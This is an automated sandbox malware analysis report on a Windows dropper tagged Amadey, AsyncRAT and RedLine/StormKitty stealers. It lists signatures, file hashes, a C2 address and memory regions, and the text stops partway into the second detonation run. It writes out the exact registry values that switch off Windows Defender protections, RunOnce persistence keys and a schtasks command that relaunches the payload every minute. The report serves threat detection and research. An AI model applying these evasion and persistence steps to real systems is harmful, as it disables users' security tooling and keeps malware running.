Malware Analysis Report

2025-06-16 03:29

Sample ID 230506-1v8axsac24
Target 5573a3d76553db4d4d4aba4f2706bc4ed75ffd3ffb934896b38096a741dc75b4.bin
SHA256 5573a3d76553db4d4d4aba4f2706bc4ed75ffd3ffb934896b38096a741dc75b4
Tags
amadey evasion persistence trojan asyncrat redline stormkitty default discovery infostealer rat spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

5573a3d76553db4d4d4aba4f2706bc4ed75ffd3ffb934896b38096a741dc75b4

Threat Level: Known bad

The file 5573a3d76553db4d4d4aba4f2706bc4ed75ffd3ffb934896b38096a741dc75b4.bin was found to be: Known bad.

Malicious Activity Summary

amadey evasion persistence trojan asyncrat redline stormkitty default discovery infostealer rat spyware stealer

StormKitty

Detects Redline Stealer samples

RedLine

Modifies Windows Defender Real-time Protection settings

Amadey

AsyncRat

StormKitty payload

Async RAT payload

Downloads MZ/PE file

Checks computer location settings

Windows security modification

Loads dropped DLL

Executes dropped EXE

Reads user/profile data of web browsers

Accesses 2FA software files, possible credential harvesting

Legitimate hosting services abused for malware hosting/C2

Adds Run key to start application

Drops desktop.ini file(s)

Checks installed software on the system

Accesses cryptocurrency files/wallets, possible credential harvesting

Suspicious use of SetThreadContext

Enumerates physical storage devices

Unsigned PE

Program crash

Suspicious use of SendNotifyMessage

Suspicious use of SetWindowsHookEx

Runs ping.exe

Modifies registry class

Suspicious use of AdjustPrivilegeToken

Suspicious use of FindShellTrayWindow

Delays execution with timeout.exe

Creates scheduled task(s)

Checks processor information in registry

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-05-06 21:59

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-05-06 21:59

Reported

2023-05-06 23:42

Platform

win7-20230220-en

Max time kernel

245s

Max time network

332s

Command Line

"C:\Users\Admin\AppData\Local\Temp\5573a3d76553db4d4d4aba4f2706bc4ed75ffd3ffb934896b38096a741dc75b4.exe"

Signatures

Amadey

trojan amadey

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\49849443.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\u87253422.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\u87253422.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\49849443.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\49849443.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\49849443.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\49849443.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\49849443.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\u87253422.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\u87253422.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\u87253422.exe N/A

Windows security modification

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\49849443.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\49849443.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\u87253422.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\za152989.exe N/A
Key created \REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\za670495.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\za670495.exe N/A
Key created \REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce C:\Users\Admin\AppData\Local\Temp\5573a3d76553db4d4d4aba4f2706bc4ed75ffd3ffb934896b38096a741dc75b4.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\5573a3d76553db4d4d4aba4f2706bc4ed75ffd3ffb934896b38096a741dc75b4.exe N/A
Key created \REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\za786024.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\za786024.exe N/A
Key created \REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\za152989.exe N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\49849443.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\u87253422.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\xUqiw01.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\w01PN11.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 668 wrote to memory of 580 (7 calls) N/A C:\Users\Admin\AppData\Local\Temp\5573a3d76553db4d4d4aba4f2706bc4ed75ffd3ffb934896b38096a741dc75b4.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\za786024.exe
PID 580 wrote to memory of 1800 (7 calls) N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\za786024.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\za152989.exe
PID 1800 wrote to memory of 632 (7 calls) N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\za152989.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\za670495.exe
PID 632 wrote to memory of 1672 (7 calls) N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\za670495.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\49849443.exe
PID 632 wrote to memory of 1944 (7 calls) N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\za670495.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\u87253422.exe
PID 1800 wrote to memory of 1608 (7 calls) N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\za152989.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\w01PN11.exe
PID 1608 wrote to memory of 1616 (7 calls) N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\w01PN11.exe C:\Users\Admin\AppData\Local\Temp\5cb6818d6c\oneetx.exe
PID 580 wrote to memory of 1636 (7 calls) N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\za786024.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\xUqiw01.exe
PID 1616 wrote to memory of 1056 (7 calls) N/A C:\Users\Admin\AppData\Local\Temp\5cb6818d6c\oneetx.exe C:\Windows\SysWOW64\schtasks.exe

Processes

C:\Users\Admin\AppData\Local\Temp\5573a3d76553db4d4d4aba4f2706bc4ed75ffd3ffb934896b38096a741dc75b4.exe

"C:\Users\Admin\AppData\Local\Temp\5573a3d76553db4d4d4aba4f2706bc4ed75ffd3ffb934896b38096a741dc75b4.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\za786024.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\za786024.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\za152989.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\za152989.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\za670495.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\za670495.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\49849443.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\49849443.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\u87253422.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\u87253422.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\w01PN11.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\w01PN11.exe

C:\Users\Admin\AppData\Local\Temp\5cb6818d6c\oneetx.exe

"C:\Users\Admin\AppData\Local\Temp\5cb6818d6c\oneetx.exe"

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\xUqiw01.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\xUqiw01.exe

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\Admin\AppData\Local\Temp\5cb6818d6c\oneetx.exe" /F

Network

Country Destination Domain Proto
N/A 185.161.248.72:38452 tcp
N/A 185.161.248.72:38452 tcp

Files

\Users\Admin\AppData\Local\Temp\IXP000.TMP\za786024.exe

MD5 cb7724f0cfbc465a48b1832d3419edd7
SHA1 f8553bffe63bbc454ef98c6c1ec3736b9e0a81aa
SHA256 0a77eec7259fe2048bd127f7be7af966085f73415221dd04457713348393b940
SHA512 f646e478eacb637adb358d6d3a367259de84b078465656a77f62e9d0b7443589ddfd79138730ae317649d0a1cc2b7b89a5d0c30b7f083c25671dd57c6881e933

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\za786024.exe

MD5 cb7724f0cfbc465a48b1832d3419edd7
SHA1 f8553bffe63bbc454ef98c6c1ec3736b9e0a81aa
SHA256 0a77eec7259fe2048bd127f7be7af966085f73415221dd04457713348393b940
SHA512 f646e478eacb637adb358d6d3a367259de84b078465656a77f62e9d0b7443589ddfd79138730ae317649d0a1cc2b7b89a5d0c30b7f083c25671dd57c6881e933

\Users\Admin\AppData\Local\Temp\IXP001.TMP\za152989.exe

MD5 2c370254d2b62b9fa0a22d82556bb9db
SHA1 98dd76e9e34d752e6110a70e514f8dc94e914ebd
SHA256 ecbed5e995e73dd69c417d6a3a422f3c93d1149c6a8acbed56f181535208463b
SHA512 9d0aab28dd1c4865053fd9995ded31ca14da398d2c407b46253f10abe079159fb9cace32312e25402463a24b727930db0edefebe5b8da9d57ac4493603845843

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\za152989.exe

MD5 2c370254d2b62b9fa0a22d82556bb9db
SHA1 98dd76e9e34d752e6110a70e514f8dc94e914ebd
SHA256 ecbed5e995e73dd69c417d6a3a422f3c93d1149c6a8acbed56f181535208463b
SHA512 9d0aab28dd1c4865053fd9995ded31ca14da398d2c407b46253f10abe079159fb9cace32312e25402463a24b727930db0edefebe5b8da9d57ac4493603845843

\Users\Admin\AppData\Local\Temp\IXP002.TMP\za670495.exe

MD5 2013df3ab4c393dbfeb56100e4c414a6
SHA1 1a0e09673ca2c1e3bfd7b5ed5e03cead327f3ac2
SHA256 1081bd699d986ef6b0fc0d99c1dbb1c26bdfacc89249078e611c3cba538bd878
SHA512 7bd1d58142e9b9346096b297fa286f1bf7f161e246caa27774255e91416357de9b481675fc9f63430b2dd399758521166130e7f3ce590bfc2462a3e28d0b15fb

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\za670495.exe

MD5 2013df3ab4c393dbfeb56100e4c414a6
SHA1 1a0e09673ca2c1e3bfd7b5ed5e03cead327f3ac2
SHA256 1081bd699d986ef6b0fc0d99c1dbb1c26bdfacc89249078e611c3cba538bd878
SHA512 7bd1d58142e9b9346096b297fa286f1bf7f161e246caa27774255e91416357de9b481675fc9f63430b2dd399758521166130e7f3ce590bfc2462a3e28d0b15fb

\Users\Admin\AppData\Local\Temp\IXP003.TMP\49849443.exe

MD5 6bb86793dc581b29147c2d4d5bad8ce6
SHA1 c5ffe67ea0f190d661779969a5da2b843e9eaf6d
SHA256 ccf25cf1cb0269655e2003b30ed9fdc3d0225bb49b91bc301978e809bcf517bd
SHA512 376e2188605a7c9f9d69a01960b2ff2554060adc7b254ba5c827be86b3e100b628abe281231d09d29e85ba8230f2f08be4d41b0a035da6914bfeec8994559d52

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\49849443.exe

MD5 6bb86793dc581b29147c2d4d5bad8ce6
SHA1 c5ffe67ea0f190d661779969a5da2b843e9eaf6d
SHA256 ccf25cf1cb0269655e2003b30ed9fdc3d0225bb49b91bc301978e809bcf517bd
SHA512 376e2188605a7c9f9d69a01960b2ff2554060adc7b254ba5c827be86b3e100b628abe281231d09d29e85ba8230f2f08be4d41b0a035da6914bfeec8994559d52

memory/1672-94-0x00000000005E0000-0x00000000005FA000-memory.dmp

memory/1672-95-0x0000000001FB0000-0x0000000001FC8000-memory.dmp

memory/1672-96-0x0000000001FB0000-0x0000000001FC3000-memory.dmp

memory/1672-97-0x0000000001FB0000-0x0000000001FC3000-memory.dmp

memory/1672-99-0x0000000001FB0000-0x0000000001FC3000-memory.dmp

memory/1672-101-0x0000000001FB0000-0x0000000001FC3000-memory.dmp

memory/1672-103-0x0000000001FB0000-0x0000000001FC3000-memory.dmp

memory/1672-105-0x0000000001FB0000-0x0000000001FC3000-memory.dmp

memory/1672-107-0x0000000001FB0000-0x0000000001FC3000-memory.dmp

memory/1672-111-0x0000000001FB0000-0x0000000001FC3000-memory.dmp

memory/1672-109-0x0000000001FB0000-0x0000000001FC3000-memory.dmp

memory/1672-113-0x0000000001FB0000-0x0000000001FC3000-memory.dmp

memory/1672-117-0x0000000001FB0000-0x0000000001FC3000-memory.dmp

memory/1672-115-0x0000000001FB0000-0x0000000001FC3000-memory.dmp

memory/1672-119-0x0000000001FB0000-0x0000000001FC3000-memory.dmp

memory/1672-123-0x0000000001FB0000-0x0000000001FC3000-memory.dmp

memory/1672-121-0x0000000001FB0000-0x0000000001FC3000-memory.dmp

memory/1672-124-0x0000000004A80000-0x0000000004AC0000-memory.dmp

memory/1672-125-0x0000000004A80000-0x0000000004AC0000-memory.dmp

memory/1672-126-0x0000000004A80000-0x0000000004AC0000-memory.dmp

memory/1672-127-0x0000000004A80000-0x0000000004AC0000-memory.dmp

memory/1672-128-0x0000000004A80000-0x0000000004AC0000-memory.dmp

memory/1672-129-0x0000000004A80000-0x0000000004AC0000-memory.dmp

\Users\Admin\AppData\Local\Temp\IXP003.TMP\u87253422.exe

MD5 72627a85c40f3bdaf6b6b451f742f1e9
SHA1 44a15ee128d050db7dca4884f1ccd2f584d7915e
SHA256 fff90eff8d06d499e00aedf10eb72330db25202b7bc1d1bb9f2cafda8bd8a5b7
SHA512 6ea7124b57cd1786b38a109144c51f2c0d5ca6d1821d30a208d53598ee0d9053f3c3bba6c2ec6ef288d2d8c45b751001590abb033ead29b2803e462dbd0b4eed

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\u87253422.exe

MD5 72627a85c40f3bdaf6b6b451f742f1e9
SHA1 44a15ee128d050db7dca4884f1ccd2f584d7915e
SHA256 fff90eff8d06d499e00aedf10eb72330db25202b7bc1d1bb9f2cafda8bd8a5b7
SHA512 6ea7124b57cd1786b38a109144c51f2c0d5ca6d1821d30a208d53598ee0d9053f3c3bba6c2ec6ef288d2d8c45b751001590abb033ead29b2803e462dbd0b4eed

memory/1944-140-0x00000000005B0000-0x00000000005CA000-memory.dmp

memory/1944-141-0x0000000000B40000-0x0000000000B58000-memory.dmp

memory/1944-142-0x0000000000B40000-0x0000000000B52000-memory.dmp

memory/1944-143-0x0000000000B40000-0x0000000000B52000-memory.dmp

memory/1944-145-0x0000000000B40000-0x0000000000B52000-memory.dmp

memory/1944-147-0x0000000000B40000-0x0000000000B52000-memory.dmp

memory/1944-149-0x0000000000B40000-0x0000000000B52000-memory.dmp

memory/1944-151-0x0000000000B40000-0x0000000000B52000-memory.dmp

memory/1944-153-0x0000000000B40000-0x0000000000B52000-memory.dmp

memory/1944-155-0x0000000000B40000-0x0000000000B52000-memory.dmp

memory/1944-157-0x0000000000B40000-0x0000000000B52000-memory.dmp

memory/1944-159-0x0000000000B40000-0x0000000000B52000-memory.dmp

memory/1944-161-0x0000000000B40000-0x0000000000B52000-memory.dmp

memory/1944-163-0x0000000000B40000-0x0000000000B52000-memory.dmp

memory/1944-165-0x0000000000B40000-0x0000000000B52000-memory.dmp

memory/1944-167-0x0000000000B40000-0x0000000000B52000-memory.dmp

memory/1944-169-0x0000000000B40000-0x0000000000B52000-memory.dmp

memory/1944-170-0x0000000000240000-0x000000000026D000-memory.dmp

memory/1944-171-0x0000000004BC0000-0x0000000004C00000-memory.dmp

memory/1944-172-0x0000000004BC0000-0x0000000004C00000-memory.dmp

memory/1944-173-0x0000000004BC0000-0x0000000004C00000-memory.dmp

memory/1944-174-0x0000000000400000-0x0000000000466000-memory.dmp

memory/1944-175-0x0000000004BC0000-0x0000000004C00000-memory.dmp

memory/1944-176-0x0000000004BC0000-0x0000000004C00000-memory.dmp

memory/1944-177-0x0000000004BC0000-0x0000000004C00000-memory.dmp

memory/1944-179-0x0000000000400000-0x0000000000466000-memory.dmp

\Users\Admin\AppData\Local\Temp\IXP002.TMP\w01PN11.exe

MD5 e05249b60272a0a33974a9cf62a06a6c
SHA1 75c7ea58f69bc67d073375f5a23f7438ec78004b
SHA256 c65feb2de5a8c5960ee2ceab10f5a47623a88a62f07d958206fd8c4e41077068
SHA512 ce4df9d8cca820e37054d9081f79d6076887d13eac97f30da762d436b7acf28688523350d47cee5fc69d65b6cba90e3c0426745b7c473f8ade574fbb491f80ad

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\w01PN11.exe

MD5 e05249b60272a0a33974a9cf62a06a6c
SHA1 75c7ea58f69bc67d073375f5a23f7438ec78004b
SHA256 c65feb2de5a8c5960ee2ceab10f5a47623a88a62f07d958206fd8c4e41077068
SHA512 ce4df9d8cca820e37054d9081f79d6076887d13eac97f30da762d436b7acf28688523350d47cee5fc69d65b6cba90e3c0426745b7c473f8ade574fbb491f80ad

C:\Users\Admin\AppData\Local\Temp\5cb6818d6c\oneetx.exe

MD5 e05249b60272a0a33974a9cf62a06a6c
SHA1 75c7ea58f69bc67d073375f5a23f7438ec78004b
SHA256 c65feb2de5a8c5960ee2ceab10f5a47623a88a62f07d958206fd8c4e41077068
SHA512 ce4df9d8cca820e37054d9081f79d6076887d13eac97f30da762d436b7acf28688523350d47cee5fc69d65b6cba90e3c0426745b7c473f8ade574fbb491f80ad

memory/1608-186-0x00000000009D0000-0x00000000009D1000-memory.dmp

\Users\Admin\AppData\Local\Temp\5cb6818d6c\oneetx.exe

MD5 e05249b60272a0a33974a9cf62a06a6c
SHA1 75c7ea58f69bc67d073375f5a23f7438ec78004b
SHA256 c65feb2de5a8c5960ee2ceab10f5a47623a88a62f07d958206fd8c4e41077068
SHA512 ce4df9d8cca820e37054d9081f79d6076887d13eac97f30da762d436b7acf28688523350d47cee5fc69d65b6cba90e3c0426745b7c473f8ade574fbb491f80ad

\Users\Admin\AppData\Local\Temp\IXP001.TMP\xUqiw01.exe

MD5 ca0980a62c6480dabf9d26117d623f05
SHA1 bb95dde6ee8b8dfa0852c0f32f3ff2fa35637f63
SHA256 5071c97190248e4dd42b8869cddbfcaffaccd1a9cabd14cb38e1390fd2560995
SHA512 3ae147f7c1de10e180da5d79c36a4f14c2086bdcbcb2f40bde279f6067a66859e67fead3d898a36f8ff31261bd9e6eae1a2a4199a62cc79840d2a83d67ec248b

C:\Users\Admin\AppData\Local\Temp\5cb6818d6c\oneetx.exe

MD5 e05249b60272a0a33974a9cf62a06a6c
SHA1 75c7ea58f69bc67d073375f5a23f7438ec78004b
SHA256 c65feb2de5a8c5960ee2ceab10f5a47623a88a62f07d958206fd8c4e41077068
SHA512 ce4df9d8cca820e37054d9081f79d6076887d13eac97f30da762d436b7acf28688523350d47cee5fc69d65b6cba90e3c0426745b7c473f8ade574fbb491f80ad

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\xUqiw01.exe

MD5 ca0980a62c6480dabf9d26117d623f05
SHA1 bb95dde6ee8b8dfa0852c0f32f3ff2fa35637f63
SHA256 5071c97190248e4dd42b8869cddbfcaffaccd1a9cabd14cb38e1390fd2560995
SHA512 3ae147f7c1de10e180da5d79c36a4f14c2086bdcbcb2f40bde279f6067a66859e67fead3d898a36f8ff31261bd9e6eae1a2a4199a62cc79840d2a83d67ec248b

\Users\Admin\AppData\Local\Temp\IXP001.TMP\xUqiw01.exe

MD5 ca0980a62c6480dabf9d26117d623f05
SHA1 bb95dde6ee8b8dfa0852c0f32f3ff2fa35637f63
SHA256 5071c97190248e4dd42b8869cddbfcaffaccd1a9cabd14cb38e1390fd2560995
SHA512 3ae147f7c1de10e180da5d79c36a4f14c2086bdcbcb2f40bde279f6067a66859e67fead3d898a36f8ff31261bd9e6eae1a2a4199a62cc79840d2a83d67ec248b

C:\Users\Admin\AppData\Local\Temp\5cb6818d6c\oneetx.exe

MD5 e05249b60272a0a33974a9cf62a06a6c
SHA1 75c7ea58f69bc67d073375f5a23f7438ec78004b
SHA256 c65feb2de5a8c5960ee2ceab10f5a47623a88a62f07d958206fd8c4e41077068
SHA512 ce4df9d8cca820e37054d9081f79d6076887d13eac97f30da762d436b7acf28688523350d47cee5fc69d65b6cba90e3c0426745b7c473f8ade574fbb491f80ad

\Users\Admin\AppData\Local\Temp\5cb6818d6c\oneetx.exe

MD5 e05249b60272a0a33974a9cf62a06a6c
SHA1 75c7ea58f69bc67d073375f5a23f7438ec78004b
SHA256 c65feb2de5a8c5960ee2ceab10f5a47623a88a62f07d958206fd8c4e41077068
SHA512 ce4df9d8cca820e37054d9081f79d6076887d13eac97f30da762d436b7acf28688523350d47cee5fc69d65b6cba90e3c0426745b7c473f8ade574fbb491f80ad

\Users\Admin\AppData\Local\Temp\IXP001.TMP\xUqiw01.exe

MD5 ca0980a62c6480dabf9d26117d623f05
SHA1 bb95dde6ee8b8dfa0852c0f32f3ff2fa35637f63
SHA256 5071c97190248e4dd42b8869cddbfcaffaccd1a9cabd14cb38e1390fd2560995
SHA512 3ae147f7c1de10e180da5d79c36a4f14c2086bdcbcb2f40bde279f6067a66859e67fead3d898a36f8ff31261bd9e6eae1a2a4199a62cc79840d2a83d67ec248b

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\xUqiw01.exe

MD5 ca0980a62c6480dabf9d26117d623f05
SHA1 bb95dde6ee8b8dfa0852c0f32f3ff2fa35637f63
SHA256 5071c97190248e4dd42b8869cddbfcaffaccd1a9cabd14cb38e1390fd2560995
SHA512 3ae147f7c1de10e180da5d79c36a4f14c2086bdcbcb2f40bde279f6067a66859e67fead3d898a36f8ff31261bd9e6eae1a2a4199a62cc79840d2a83d67ec248b

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\xUqiw01.exe

MD5 ca0980a62c6480dabf9d26117d623f05
SHA1 bb95dde6ee8b8dfa0852c0f32f3ff2fa35637f63
SHA256 5071c97190248e4dd42b8869cddbfcaffaccd1a9cabd14cb38e1390fd2560995
SHA512 3ae147f7c1de10e180da5d79c36a4f14c2086bdcbcb2f40bde279f6067a66859e67fead3d898a36f8ff31261bd9e6eae1a2a4199a62cc79840d2a83d67ec248b

memory/1636-207-0x0000000001E70000-0x0000000001EAC000-memory.dmp

memory/1636-208-0x0000000001ED0000-0x0000000001F0A000-memory.dmp

memory/1636-210-0x0000000001ED0000-0x0000000001F05000-memory.dmp

memory/1636-212-0x0000000001ED0000-0x0000000001F05000-memory.dmp

memory/1636-209-0x0000000001ED0000-0x0000000001F05000-memory.dmp

memory/1636-745-0x00000000007E0000-0x0000000000826000-memory.dmp

memory/1636-747-0x0000000002170000-0x00000000021B0000-memory.dmp

memory/1636-749-0x0000000002170000-0x00000000021B0000-memory.dmp

memory/1636-751-0x0000000002170000-0x00000000021B0000-memory.dmp

memory/1636-1005-0x0000000002170000-0x00000000021B0000-memory.dmp

memory/1636-1007-0x0000000002170000-0x00000000021B0000-memory.dmp

memory/1636-1009-0x0000000002170000-0x00000000021B0000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2023-05-06 21:59

Reported

2023-05-06 23:39

Platform

win10v2004-20230220-en

Max time kernel

153s

Max time network

156s

Command Line

"C:\Users\Admin\AppData\Local\Temp\5573a3d76553db4d4d4aba4f2706bc4ed75ffd3ffb934896b38096a741dc75b4.exe"

Signatures

Amadey

trojan amadey

AsyncRat

rat asyncrat

Detects Redline Stealer samples

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\49849443.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\u87253422.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\u87253422.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\u87253422.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\u87253422.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\u87253422.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\49849443.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\49849443.exe N/A
